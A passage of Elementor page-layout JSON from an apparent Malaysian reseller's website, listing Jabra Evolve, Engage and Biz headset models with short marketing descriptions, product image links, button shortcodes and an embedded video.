d\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65t<\\/strong><\\/h2><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\",\"_background_background\":\"classic\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"54e8d0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2852 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\\\" alt=\\\"\\\" width=\\\"163\\\" height=\\\"163\\\" \\/><\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"93ab181\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2853 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 80<\\/strong><\\/h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75e<\\/strong><\\/h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"93f376b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2854 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f104529\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2855 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\\\" alt=\\\"\\\" width=\\\"201\\\" height=\\\"201\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"ng-binding ng-scope\\\" style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75<\\/strong><\\/h2><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"89a0b3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2856 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"434120f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2857 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\\\" alt=\\\"\\\" width=\\\"209\\\" height=\\\"209\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 40 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 30 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e63500c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"200\\\" height=\\\"200\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3f45227\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"216\\\" height=\\\"216\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"801e577\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"9929e95\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ff8dfcd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 SE<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f15601\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ef4be63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2867 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20_SE_Mono.png\\\" alt=\\\"\\\" width=\\\"204\\\" height=\\\"204\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5a94b95\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca1cdef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1a49967\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2870 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Engage_50_3.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"249\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3dd0dc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"33c6633\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Engage 50<\\/strong><\\/h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform \\u2013 whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.<\\/p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3befa73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a85e5e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d60555\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48b3240\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"89270cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd3b8a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>Jabra Biz Wired Series<\\/strong><\\/h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d449904\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"656485e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fbc0249\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9369d27\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"83ee6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"179\\\" height=\\\"179\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0dd5280\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"66a6f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fd4de1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2875 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/jabra_biz_2400_ii_mono_3-in-1.jpg\\\" alt=\\\"\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e37a9d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f989140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Jabra BIZ 2400 II Mono 3-in-1<\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38cc4d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"a2798fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cb65d6a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II DUO<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f72a8b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8703933\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7f07070\",\"elType\":\"section\",\"settings\":{\"structure\":\"34\"},\"elements\":[{\"id\":\"7909a7f\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5bb3037\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"349a8fd\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/85RJqPjfjng\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"a7a7db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1a4e97\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a4c36b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b09d5f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a83600\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"6a528d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"21f7fb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0869d9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bec7706\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300<\\/strong><\\/h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8f9ee62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"27b34fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b9598c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35b2553\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4047bd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2876 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD.png\\\" alt=\\\"\\\" width=\\\"186\\\" height=\\\"186\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"175e85c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"519e230\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6bfb90c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9e4889b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b26b188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"solution-group-card__product-name ng-binding\\\" style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD DUO<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ec1e2e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7187165\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8d1d85b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500<\\/strong><\\/h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b92f5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6008c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2879 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_QD.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e34ebbb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"48b05fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cb3f7ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><img class=\\\" wp-image-2878 alignnone\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_USB.png\\\" alt=\\\"\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73b78bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a82801\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500 DUO USB<\\/strong><\\/h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a829b4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3b4834e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b38b08e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e8e065f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7b07964\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" 